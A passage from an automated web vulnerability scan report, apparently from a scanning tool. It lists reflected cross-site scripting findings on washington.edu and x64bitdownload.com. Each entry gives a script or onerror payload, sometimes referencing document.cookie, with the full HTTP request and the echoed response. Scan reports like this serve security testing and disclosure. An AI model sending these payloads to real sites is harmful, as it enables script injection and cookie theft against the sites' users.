Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Connection: close
Date: Tue, 25 Jan 2011 04:39:29 GMT
Content-Length: 39388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...
<form method="post" action="?15a61"><script>alert(1)</script>29d0ea3ffb0=1" id="lang_form_1">
...[SNIP]...

4.1474. http://www.washington.edu/alpine/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpine/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f972a<img%20src%3da%20onerror%3dalert(1)>e6e3afeb687 was submitted in the REST URL parameter 1. This input was echoed as f972a<img src=a onerror=alert(1)>e6e3afeb687 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /alpinef972a<img%20src%3da%20onerror%3dalert(1)>e6e3afeb687/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:12:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1141
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(1)&gt;e6e3afeb687/</b> was not found or is no longer
...[SNIP]...
<br>
Reason: File does not exist: /www/world/alpinef972a<img src=a onerror=alert(1)>e6e3afeb687.</br>
...[SNIP]...

4.1475. http://www.washington.edu/alpinef972a

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload 13141><img%20src%3da%20onerror%3dalert(1)>dc54bd8fde8 was submitted in the REST URL parameter 1. This input was echoed as 13141><img src=a onerror=alert(1)>dc54bd8fde8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /alpinef972a<img13141><img%20src%3da%20onerror%3dalert(1)>dc54bd8fde8 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:07 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1181
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img13141&gt;&lt;img src=a onerror=alert(1)&gt;dc54bd8fde8</b> was not found o
...[SNIP]...
<img13141><img src=a onerror=alert(1)>dc54bd8fde8.</br>
...[SNIP]...

4.1476. http://www.washington.edu/alpinef972a

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1e946<script>alert(1)</script>a554c0a9069 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpinef972a<img?1e946<script>alert(1)</script>a554c0a9069=1 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1116
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img?1e946<script>alert(1)</script>a554c0a9069=1</b> was not found or is no lo
...[SNIP]...

4.1477. http://www.washington.edu/alpinef972a

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag attribute. The payload e2312><img%20src%3da%20onerror%3dalert(1)>f9a01abcc36 was submitted in the REST URL parameter 1. This input was echoed as e2312><img src=a onerror=alert(1)>f9a01abcc36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /alpinef972a<img%20srce2312><img%20src%3da%20onerror%3dalert(1)>f9a01abcc36=a%20onerror=alert(String.fromCharCode(88,83,83 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:10 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1328
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img srce2312&gt;&lt;img src=a onerror=alert(1)&gt;f9a01abcc36=a onerror=alert
...[SNIP]...
<img srce2312><img src=a onerror=alert(1)>f9a01abcc36=a onerror=alert(String.fromCharCode(88,83,83.</br>
...[SNIP]...

4.1478. http://www.washington.edu/alpinef972a

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 24c9e<script>alert(1)</script>e47c3de87fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83?24c9e<script>alert(1)</script>e47c3de87fe=1 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:00 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1263
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(String.fromCharCode(88,83,83?24c9e<script>alert(1)</script>e47c3de87fe=1</b>
...[SNIP]...

4.1479. http://www.washington.edu/alpinef972ae6e3afeb687/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag attribute. The payload 8624f><img%20src%3da%20onerror%3dalert(1)>a52668d1945 was submitted in the REST URL parameter 1. This input was echoed as 8624f><img src=a onerror=alert(1)>a52668d1945 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /alpinef972a<img%20src8624f><img%20src%3da%20onerror%3dalert(1)>a52668d1945=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:09 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1378
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src8624f&gt;&lt;img src=a onerror=alert(1)&gt;a52668d1945=a onerror=alert
...[SNIP]...
<img src8624f><img src=a onerror=alert(1)>a52668d1945=a onerror=alert(String.fromCharCode(88,83,83))>
...[SNIP]...

4.1480. http://www.washington.edu/alpinef972ae6e3afeb687/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b8e4f<script>alert(1)</script>22252d51a54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/?b8e4f<script>alert(1)</script>22252d51a54=1 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1313
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(String.fromCharCode(88,83,83))&gt;e6e3afeb687/?b8e4f<script>alert(1)</script>22252d51a54=1</b>
...[SNIP]...

4.1481. http://www.washington.edu/alpinef972a

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(document.cookie

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag attribute. The payload ef31e><img%20src%3da%20onerror%3dalert(1)>0cd7daaa6cd was submitted in the REST URL parameter 1. This input was echoed as ef31e><img src=a onerror=alert(1)>0cd7daaa6cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /alpinef972a<img%20srcef31e><img%20src%3da%20onerror%3dalert(1)>0cd7daaa6cd=a%20onerror=alert(document.cookie HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:07 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1289
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img srcef31e&gt;&lt;img src=a onerror=alert(1)&gt;0cd7daaa6cd=a onerror=alert
...[SNIP]...
<img srcef31e><img src=a onerror=alert(1)>0cd7daaa6cd=a onerror=alert(document.cookie.</br>
...[SNIP]...

4.1482. http://www.washington.edu/alpinef972a

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(document.cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 908e6<script>alert(1)</script>c5fe2abfd28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(document.cookie?908e6<script>alert(1)</script>c5fe2abfd28=1 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1224
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(document.cookie?908e6<script>alert(1)</script>c5fe2abfd28=1</b>
...[SNIP]...

4.1483. http://www.washington.edu/alpinef972ae6e3afeb687/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag attribute. The payload bafe1><img%20src%3da%20onerror%3dalert(1)>1bf1e4c1efb was submitted in the REST URL parameter 1. This input was echoed as bafe1><img src=a onerror=alert(1)>1bf1e4c1efb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /alpinef972a<img%20srcbafe1><img%20src%3da%20onerror%3dalert(1)>1bf1e4c1efb=a%20onerror=alert(document.cookie)>e6e3afeb687/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1336
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img srcbafe1&gt;&lt;img src=a onerror=alert(1)&gt;1bf1e4c1efb=a onerror=alert
...[SNIP]...
<img srcbafe1><img src=a onerror=alert(1)>1bf1e4c1efb=a onerror=alert(document.cookie)>
...[SNIP]...

4.1484. http://www.washington.edu/alpinef972ae6e3afeb687/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 17a40<script>alert(1)</script>9052f2c52d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/?17a40<script>alert(1)</script>9052f2c52d7=1 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1271
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a&lt;img src=a onerror=alert(document.cookie)&gt;e6e3afeb687/?17a40<script>alert(1)</script>9052f2c52d7=1</b>
...[SNIP]...

4.1485. http://www.washington.edu/pine/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /pine/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1fab8<img%20src%3da%20onerror%3dalert(1)>cbed7a69ba2 was submitted in the REST URL parameter 1. This input was echoed as 1fab8<img src=a onerror=alert(1)>cbed7a69ba2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pine1fab8<img%20src%3da%20onerror%3dalert(1)>cbed7a69ba2/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:12:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1135
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/pine1fab8&lt;img src=a onerror=alert(1)&gt;cbed7a69ba2/</b> was not found or is no longer on
...[SNIP]...
<br>
Reason: File does not exist: /www/world/pine1fab8<img src=a onerror=alert(1)>cbed7a69ba2.</br>
...[SNIP]...

4.1486. http://www.x64bitdownload.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ff09"><script>alert(1)</script>13dc0cda439 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2ff09"><script>alert(1)</script>13dc0cda439=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:32:37 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 64584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/?2ff09"><script>alert(1)</script>13dc0cda439=1" />
...[SNIP]...

4.1487. http://www.x64bitdownload.com/64-bit-assembling-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-assembling-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2b79"><script>alert(1)</script>8459f495ec0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-assembling-downloads.htmle2b79"><script>alert(1)</script>8459f495ec0 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72826


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-assembling-downloads.htmle2b79"><script>alert(1)</script>8459f495ec0" />
...[SNIP]...

4.1488. http://www.x64bitdownload.com/64-bit-assembling-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-assembling-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 634a7"><script>alert(1)</script>8617ba432e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-assembling-downloads.html?634a7"><script>alert(1)</script>8617ba432e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:36 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72828


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-assembling-downloads.html?634a7"><script>alert(1)</script>8617ba432e=1" />
...[SNIP]...

4.1489. http://www.x64bitdownload.com/64-bit-atom-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-atom-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55aa1"><script>alert(1)</script>7678cf509d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-atom-downloads.html55aa1"><script>alert(1)</script>7678cf509d9 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:14 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89362


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-atom-downloads.html55aa1"><script>alert(1)</script>7678cf509d9" />
...[SNIP]...

4.1490. http://www.x64bitdownload.com/64-bit-atom-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-atom-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8505"><script>alert(1)</script>10d78ca816a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-atom-downloads.html?e8505"><script>alert(1)</script>10d78ca816a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:13 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89365


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
